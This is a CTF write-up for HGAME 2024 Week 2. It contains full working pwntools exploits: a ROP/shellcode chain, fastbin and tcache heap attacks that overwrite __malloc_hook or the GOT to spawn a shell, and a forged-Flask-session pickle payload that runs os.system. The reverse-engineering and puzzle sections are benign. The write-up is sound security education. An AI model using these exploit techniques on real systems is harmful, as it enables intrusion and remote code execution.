Try   HackMD

HGAME 2024 Week2

links:

PWN. Shellcode Master

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More →

  • The first payload is restricted to 22 bytes.
  • All generic registers are wiped.
  • The shellcode area is mprotect-ed to --x as soon as the first payload is read.

The key idea is, do not focus on the shellcode area, but the stack. You are even not able to call any subprocess without a stack.

If we manage to rebuild a stack at any static address, and manually form an ROP-like shellcode, it might be able to reuse the shellcode many times, which probably let us call read() again to place a rich payload.

After some ramdom trial, I successfully made a reuseable shellcode, which setup a basic read() syscall:

mov esp,{0x404000+8*4}; moving imm32 takes 5bytes
push 120;    len |  pushing imm8 takes 2 bytes
push 0;      fd  |  2
push 0; sys_READ |  2
push rsp;    buf |  1
; pushing/popping generic register (no x64 prefix) takes 1 byte

; <<< reusable rop gadgets at 0x233300c
pop rsi;     1 
pop rax;     1
pop rdi;     1
pop rdx;     1 
syscall;     2
ret;         1
; >>>
; total length: 19 bytes

The remaining steps:

  • Call read() several times to place ROP payloads;
  • Perform ROP to mprotect() the shellcode area to be rwx;
  • Call read() to write the final shellcode to the rwx landing pad.

EXP (partial):

# sc1: place stack & ROP gadgets
sc1 = asm(
    f"mov esp,{0x404000+8*4}; push 120; push 0; push 0; push rsp; pop rsi; pop rax; pop rdi; pop rdx; syscall; ret;"
)

# rop1: recall read() to place larger payloads
padding = p64(0xDEADC0DE) * 3  # $rsp => 0x404020, write at 0x404008, fill 8*3 bytes
rop1 = padding + p64(gadgets_addr) + p64(0x404000) + p64(0) + p64(0) + p64(0x1000)

# rop2: call mprotect(&sc, 0x1000, 7)
padding = p64(0xDEADC0DE) * 9  # $rsp => 0x404048, write at 0x404000, fill 8*9 bytes
rop2 = padding + p64(gadgets_addr) + p64(0x1000) + p64(0xA) + p64(0x2333000) + p64(7)

# rop3: call read(0, &sc, 0x1000) and jump to sc
rop3 = (
    p64(gadgets_addr) + p64(0x2333000) + p64(0) + p64(0) + p64(0x1000) + p64(0x2333000)
)

# sc2: shellcraft
sc2 = b"\x90" * 32 + asm(shellcraft.amd64.linux.cat("/flag"))

p.s. There is indeed a short 22 bytes shellcode, but it's totally unrelated. Don't be trapped!

PWN. FastNote

  • A typical menu program, examining fastbin attacks.
  • The program contains 3 functions
    • Add a note
    • Show the note at specified index
    • Delete the note at specified index
  • Any content can be stored once when adding, and the note size is restricted to 0x80, which happen to allow the creation of the smallest (0x80+0x10) unsorted bin (for leakage of libc base address).
    Image Not Showing Possible Reasons
    • The image was uploaded to a note which you don't have access to
    • The note which the image was originally uploaded to has been deleted
    Learn More →
  • There is an UAF vulnerability in delete function, which may cooperate with show function to exposes essential data from freed chunks:
    Image Not Showing Possible Reasons
    • The image was uploaded to a note which you don't have access to
    • The note which the image was originally uploaded to has been deleted
    Learn More →

Thoughts

  • Fill 0x90-sized tcaches to put a chunk into unsorted bin.
  • Read the chunk to leak libc.
  • Fill fastbin-sized tcaches to do a fastbin double-free;
  • The fastbin double-free will put two same chunk into fastbin lists.
  • Call malloc() to drain tcache list;
  • Call malloc() to drain fastbin list. Since the victim chunk has been allocated and filled with data before allocating it again, its content will be confused with the freed-chunk layout, where the fd is overlapped with our user data.
  • When malloc() is trying to allocate chunks from fastbin lists, the remainigs will be stashed into tcache list, where it lacks validation thus arbitary address can be treated as a chunk and returned.
  • Read the arbitary address by showing the note of fake chunk and write it by adding.

Exploitation

from pwn import * context.arch = "amd64" tc_size = 0x70 # chunk => 0x80 def getr(): # r = remote("127.0.0.1", 9000) r = remote("106.14.57.14", 30145) print(r.recv().decode()) return r r = getr() def add(x, size, content): r.sendline(b"1") # add r.sendline(b"%d" % x) # index r.sendline(b"%d" % size) # size r.send(content) # content r.clean() def show(x): r.sendline(b"2") # show r.recvuntil(b"Index") r.clean() r.sendline(b"%d" % x) # index return r.recv() def rm(x): r.sendline(b"3") # rm r.sendline(b"%d" % x) # index r.clean() # tcaches for fastbin double free for i in range(7): add(i, tc_size, b"TC") # this is the victim chunks whose memory layout is overlapped with others add(10, tc_size, b"FB") add(11, tc_size, b"FB") # the helper # fill tcache for i in range(7): rm(i) info("tcache filled") # pause() # fastbin double free, so that the `fd`` of victim chunk points to arbitrary address rm(10) rm(11) rm(10) # drain tcache for i in range(7): add(i, tc_size, f"TC{i}".encode()) info("tcache drained, about to write") # pause() # tcaches for leaking for i in range(8): add(i, 0x80, b"MX") add(15, 5, "LATCH") # => unsorted bin for i in range(8): rm(i) main_arena_ref = show(7) main_arena_ref = u64(main_arena.split(b"\n")[0].ljust(8, b"\x00")) # offsets are retrieved by gdb debugging malloc_hook = main_arena_ref - 0x70 base = malloc_hook - 0x1ECB70 # 0xe3b01 execve("/bin/sh", r15, rdx) # constraints: # [r15] == NULL || r15 == NULL || r15 is a valid argv # [rdx] == NULL || rdx == NULL || rdx is a valid envp one_gadget = base + 0xE3B01 success( f"malloc_hook: {hex(malloc_hook)}\nlibc base: {hex(base)}" ) # allloc chunks back, the new chunk will be "allocated" at the address of `fd` of the victim chunk add(10, tc_size, p64(malloc_hook)) # victim, a fake `fd` is placed when it is allocated add(11, tc_size, b"#11") add(10, tc_size, p64(malloc_hook)) # alloc victim again, content overlapps `fd` # alloc to overwrite malloc_hook add(12, tc_size, p64(one_gadget)) add(13, tc_size, b"id\n") # trigger malloc_hook r.interactive()

References

PWN. OldFastNote

Very similar to fast note challange, except the program was built with old glibc2.23.

  • No tcaches, the fastbins and unsorted bins can be directly used.
  • But on the other hand, the address of forged chunk must be chosen very carefully to bypass the size check of fastbins in malloc()

Take a look around the __malloc_hook:

CleanShot 2024-02-08 at 07.43.17@2x We can see that it's possible to treat these 8 bytes as u64(0x7f) and place a 0x7* sized fastbin chunk here to cover the __malloc_hook.

In order to pick the chunk into correct slot of fastbins, the "chunk forger" i.e. the previous legal chunks must be in same size category. Thus the size of the requiring notes should be 0x60 (+0x10).

# interactive functions # ... note_size = 0x60 # chunk => 0x70 add(0, 0x80, b"UB") # unsorted bin, to leak arena add(1, note_size, b"1") # double free construtions add(2, note_size, b"2") rm(0) main_arena = u64(show(0).split(b"\n")[0].ljust(8, b"\x00")) malloc_hook = main_arena - 0x68 base = malloc_hook - 0x3C4B10 # perform double free rm(1) rm(2) rm(1) add(1, note_size, p64(malloc_hook - 0x23)) add(2, note_size, b"2") pause() # <= check if the fake chunk is correctly linked add(1, note_size, p64(malloc_hook - 0x23)) add(3, note_size, b"X" * 11 + p64(one_gadget) * 5) # trigger malloc hook add(4, note_size, b"SHELL")

CleanShot 2024-02-08 at 08.08.09@2x

At the pause point we can see the forged chunk has got a valid size and linked to the legal chunk going to be allocated. The mask bits won't be check during allocating from fastbins, so the chunk is returned as expected.

And the last thing worth mentioning is the one gadget.

root@2f5d6248e758:/tmp/ofastnote# one_gadget libc-2.23.so
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL || {[rsp+0x30], [rsp+0x38], [rsp+0x40], [rsp+0x48], ...} is a valid argv

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL || {[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...} is a valid argv

Break at where the one gadget being executed and test these constraints, it turns that $rsp+0x50 and $rsp+0x70 are likely to be same and probably be 0. So just take the latter 2 gadgets.

PWN. EldenRingII

An even easier version of fast note. There are add / delete / edit / show 4 functions, and still a UAF which enables to write any data to the freed chunks.

[+] checksec for '/tmp/ringII/vuln_patched'
Canary                        : ✘
NX                            : ✓
PIE                           : ✘
Fortify                       : ✘
RelRO                         : Partial

As it shows the program is statically mapped and the got.plt is writable. So the exploitation can be very simplified to:

  • Perform fastbin double-free to construct a chunk covering the static notes variables.
  • Edit the chunk, then we can modify any notes pointer
  • Read / write arbitary address by Showing / Editing the content of notes being modified.
  • Since we got stable read-write loop, let DynELF finish the job. We can hijack any entry of got.plt to execute the getshell gadget.
# interactive functions # ... # https://github.com/shellphish/how2heap/blob/master/glibc_2.31/tcache_poisoning.c add(0, tc_size) add(1, tc_size) rm(0) rm(1) # change the #1.fd to &notes so that it will be returned later when malloc() edit(1, p64(v.sym["notes"])) # v => vulnerable add(2, tc_size) add(3, tc_size) # the fake chunk; => &notes[0] # now we get R/W loop at arbitary address def leak(addr): edit(3, p64(addr)) # change note[0] to point to addr ret = show(0) if not ret: ret = b"\x00" # puts() treatment return ret def write(addr, data): edit(3, p64(addr)) edit(0, data) # write any data to addr # network check, those time-related chore has to be tweaked assert leak(v.sym["main"])[:4] == bytes.fromhex("F3 0F 1E FA") success("Arbitary RW ready") # normal DynELF routine dyn = DynELF(leak, pointer=0x401000) system = dyn.lookup("system", "./libc.so.6") success("essential gadgets ready") write(0x404500, b"/bin/sh\x00") # place /bin/sh into any mapped R/W space write(v.got["free"], p64(system)) # got.free => system edit(3, p64(0x404500)) # change #0 => "/bin/sh" rm(0) # => system("/bin/sh") r.interactive()

RE. ezCPP

  • Nothing to do with cpp, just a boring TEA-like cipher.
  • 32 rounds each turn, repeat 4 times; each turn the encryption shift ahead by 1 byte.
    CleanShot 2024-02-08 at 20.40.32@2x
def _decipher(v, sum, delta=0xDEADBEEF): sum = ctypes.c_uint32(sum) y, z = [ctypes.c_uint32(x) for x in v] for n in range(32, 0, -1): z.value -= ( ((y.value << 4) + 3412) ^ (y.value + sum.value) ^ ((y.value << 5) + 4123) ) y.value -= ( ((z.value << 4) + 1234) ^ (z.value + sum.value) ^ ((z.value << 5) + 2341) ) sum.value -= delta return [y.value, z.value] final_sum = 0xDEADBEEF * 32 t = _decipher(unpack("<II", enc[3:11]), final_sum) t = pack("<II", *t) enc = enc[:3] + t + enc[11:] t = _decipher(unpack("<II", enc[2:10]), final_sum) t = pack("<II", *t) enc = enc[:2] + t + enc[10:] t = _decipher(unpack("<II", enc[1:9]), final_sum) t = pack("<II", *t) enc = enc[:1] + t + enc[9:] t = _decipher(unpack("<II", enc[0:8]), final_sum) t = pack("<II", *t) enc = enc[:0] + t + enc[8:] print(enc)

RE. babyRE

  • There is an initializer reseting the key:
    CleanShot 2024-02-08 at 21.16.03@2x
  • And there is a traversal loop which Xor each key byte by 0x11:
    CleanShot 2024-02-08 at 23.54.37@2x

The author put a little trap in this snippet. Don't you doubt that what's the purpose at all of setting a strange signal handler? Signumber 8 stands for SIGFPE, which is alarmed when a Float Point Exception occurs.

Okay then where does the float point come from?

Check the disassembly, we see that there is a trap hidden from the decompilation.

CleanShot 2024-02-09 at 02.31.03@2x

On the stackoverflow people had explained the FPE and div-by-zero stuff. In a word SIGFPE is raised whenever meeting arithmetic faults. So the Xor loop only executes 3 times, leaving the key "wtxfei".

  • The 4 threads define 4 diffent operation on single byte.
    CleanShot 2024-02-09 at 02.47.40@2x
    CleanShot 2024-02-09 at 02.48.00@2x
  • Each of them has the same logic:
    1. Wait a semaphore.
    2. Encipher 1 byte.
    3. Increase the global index counter.
    4. Post to the next semaphore so that the next cipher function runs.

Obviously the cipher bytes are generated sequentially and entangled with the near byte. So the plain flag should be recovered from the tail.

# IDAPython struct.unpack('<'+'I'*32,get_bytes(get_name_ea_simple('enc'),32*4)) # decipher script enc = (0x2F14, 0x4E, ... , ord('}')) # manually putting the last byte makes things easy def rfn0(b, n): # input[hd] += a123456[(hd + 1) % 6] * input[hd + 1]; return c_uint32(b[n] - (a[(n + 1) % 6] * b[n + 1])).value def rfn1(b, n): # input[hd] -= a123456[(hd + 1) % 6] ^ input[hd + 1]; return c_uint32(b[n] + (a[(n + 1) % 6] ^ b[n + 1])).value def rfn2(b, n): # input[hd] *= input[hd + 1] + a123456[(hd + 1) % 6]; return c_uint32(b[n] // (a[(n + 1) % 6] + b[n + 1])).value def rfn3(b, n): # input[hd] ^= input[hd + 1] - a123456[(hd + 1) % 6]; return c_uint32(b[n] ^ (b[n + 1] - a[(n + 1) % 6])).value def transform(b, n, f): b[n] = f(b, n) return b l = list(enc) for i in range(30, -1, -1): l = transform(l, i, (rfn0, rfn1, rfn2, rfn3)[i % 4]) print(bytes(l).decode())

RE. Arithmetic

The main() function:

__int64 __stdcall likely_main(int argc, char *argv[], void *env) { unsigned int t; // eax __int64 i; // rbx FILE *f_out; // rbp int col; // edx MAPDST int row; // eax MAPDST int sum; // edi __int64 row_max; // r14 __int64 offset; // rbp __int64 chunk; // rsi int cur_path; // eax __int64 total_off; // rcx int cur_value; // eax t = time64(0i64); srand(t); i = 1i64; row = 1; col = 1; f_out = fopen(FileName, Mode); // "out", "rb" if ( fscanf(f_out, "%d", &wtf_matrix_input[1][1]) != -1 ) { do { col = 1; if ( row != col ) ++col; ++row; } while ( fscanf(f_out, "%d", &wtf_matrix_input[row][col]) != -1 ); } sum = wtf_matrix_input[1][1]; // int wtf_matrix_input[500][500] row_max = row - 1; if ( row_max >= 1 ) { offset = 1i64; chunk = 1000i64; do { cur_path = rand() % 2 + 1; total_off = chunk + offset; // offset never goes back path_vector[i] = cur_path; if ( cur_path == 1 ) { cur_value = wtf_matrix_input[0][total_off];// actually: [chunk][off] } else // path 1 => stay at pos; path 2 => pos + 1 { cur_value = wtf_matrix_input[0][total_off + 1];// actually: [chunk][off] ++offset; } sum += cur_value; ++i; chunk += 500i64; } while ( i <= row_max ); } if ( sum >= 6752833 ) // wtf max number? printf_5("hgame{path_32-bit_md5_lowercase_encrypt}"); return 0i64; }

There are some strange indecies/offsets in my decompilation. Let's take a look at the attachment file, it will be much clearer:

CleanShot 2024-02-11 at 10.23.24@2x
CleanShot 2024-02-11 at 10.40.51@2x

This is a text file containing 500 lines, and each line has a searies of numbers. The program read the whole file and randomly generate a path that goes top-down. And the accumulater sums up all the travelled number to see if greater than 6752833. If so, print the flag hint.

So our goal should be find out the way getting the max sum, and the flag will be the md5 hash of the path sequence.

Obviously this is a DP problem. The max sum at each number's position is uniquely determined. And it only depends on 2 variables: the sum from above and the sum from upper left (and the number itself, of course).

So we can solve the promblem by traversing every number, record the max sum and the path whether the sum comes from left or above. After then we take the max sum from the last row, and its path should be the answer.

import numpy as np _d = open("out").read() _dl = _d.replace(" \n", " ").split(" ")[:-1] # trim nums = np.zeros((500, 500), dtype=np.int32) nums[np.tril_indices_from(nums)] = _dl del _d del _dl max_sums = np.empty((500, 500), dtype=object) max_sums[0, 0] = (nums[0, 0], "") max_sums[1, 0] = (nums[0, 0] + nums[1, 0], "1") max_sums[1, 1] = (nums[0, 0] + nums[1, 1], "2") for row in range(2, 500): for col in range(row + 1): sum = nums[row, col] from_above = max_sums[row - 1, col] from_left = max_sums[row - 1, col - 1] if from_above and (not from_left or from_above[0] > from_left[0]): path = from_above[1] + "1" max_sums[row, col] = (sum + from_above[0], path) else: path = from_left[1] + "2" max_sums[row, col] = (sum + from_left[0], path) path = np.max(max_sums[499], axis=0) assert path[0] >= 6752833 assert len(path[1]) == 499 from hashlib import md5 flag = f"hgame{{{md5(path[1].encode()).hexdigest()}}}" print(path[1]) print(flag)

WEB. More Courses

Yet another brute-force-request challenge:

  1. Brute force the password with the hint dictionary.
  2. Brute foce the API (/api/select /api/expand):
    CleanShot 2024-02-14 at 19.16.33@2x

WEB. COW

Yet another cowsay challege.

Some keywords are filtered:

CleanShot 2024-02-12 at 21.07.00@2x

Easily bypass it by taking advantage of printf

CleanShot 2024-02-12 at 21.16.15@2x

WEB. myFlask

2 examine points.

The SECKEY used to sign the session is a time-based string, and it's fixed since the server has started:

CleanShot 2024-02-12 at 23.33.23@2x

Since it doesn't change, it's easy to brute-force it by mocking the flask session:

class MockApp(object): def __init__(self, time=(_H, 0, 0), echo=False): h, m, s = time currentDateAndTime = datetime.now(timezone("Asia/Shanghai")) dt = datetime( currentDateAndTime.year, currentDateAndTime.month, currentDateAndTime.day, h, m, s, ) self.secret_key = dt.strftime("%H%M%S") if echo: print(f"SECRET_KEY: {self.secret_key}") from flask.sessions import SecureCookieSessionInterface def mock_session(username, time, **kw): return ( SecureCookieSessionInterface() .get_signing_serializer(MockApp(time, **kw)) .dumps({"username": username}) ) # brute force the time / seckey sign_time = None with requests.Session() as s: r = s.get(f"{url}") real_session = s.cookies["session"] for m in range(60): for sec in range(60): fake_session = mock_session("guest", (_H, m, sec)) if fake_session == real_session: sign_time = (_H, m, sec) print(f"found ts: {sign_time}") mock_session("guest", (_H, m, sec), echo=True) break

The flag can be retrieved by the send_file() route:

CleanShot 2024-02-12 at 23.40.21@2x

We can make an evil pickle to execute a system command that cat the flag into app.py, and access / to get the result. Attention that the server automatically reloads when the source file changes, so the SECKEY need to be cracked again each time after executing the "write-to-file" command.

# explit the pickle class Exploit(object): def __reduce__(self): return (os.system, ("""printf '\n# %s' $(cat /flag) >> app.py """,)) with requests.Session() as s: fake_session = mock_session("admin", sign_time) s.cookies["session"] = fake_session r = s.get(f"{url}/flag") assert "admin" in r.text pickle_data = pickle.dumps(Exploit()) pickle_data_b64 = base64.b64encode(pickle_data).decode() data = {"pickle_data": pickle_data_b64} r = s.post(f"{url}/flag", data=data) open("/tmp/result.html", "w").write(r.text)

Attachment: the source

import pickle import base64 from flask import Flask, session, request, send_file from datetime import datetime from pytz import timezone currentDateAndTime = datetime.now(timezone('Asia/Shanghai')) currentTime = currentDateAndTime.strftime("%H%M%S") app = Flask(__name__) # Tips: Try to crack this first ↓ app.config['SECRET_KEY'] = currentTime print(currentTime) @app.route('/') def index(): session['username'] = 'guest' return send_file('app.py') @app.route('/flag', methods=['GET', 'POST']) def flag(): if not session: return 'There is no session available in your client :(' if request.method == 'GET': return 'You are {} now'.format(session['username']) # For POST requests from admin if session['username'] == 'admin': pickle_data=base64.b64decode(request.form.get('pickle_data')) # Tips: Here try to trigger RCE userdata=pickle.loads(pickle_data) return userdata else: return 'Access Denied' if __name__=='__main__': app.run(debug=True, host="0.0.0.0")

MISC. 华容道

A programming challenge about the "Klotski", a.k.a the「华容道」 puzzle.

The game server sets a very severe restriction that requrires solving 11 rounds of the puzzle (up to 180 steps!) in 10 seconds. This is very hard for python to follow up. I realized that long after finishing the algorithm, at the moment the code had been filled with nested functions and exceptions. So I didn't want to port the algorighm to other languages.

I finally managed to speed up by caching all solutions found previously, and burn up the CPU to generate as much as possible solutions with multiprocessing.

Eventually the challenge was won by 280+ pre-calculated solutions.

CleanShot 2024-02-13 at 16.09.47@2x
CleanShot 2024-02-13 at 16.27.37@2x

The solver script is hosted on gist.

DO NOT MESS UP WITH "HIGH-LEVEL ABSTRACTION" IN PYTHON!

I mean, the numpy ndarray or any other "more human-friendly" data types / abstracitons. They lack so much of optimization that over 60% CPU time was wasted on type conversions and data recompositions. The builtinlistcomp method ate about 20% CPU time, which was really ridiculous.

That's the real lesson I learnt from this challenge.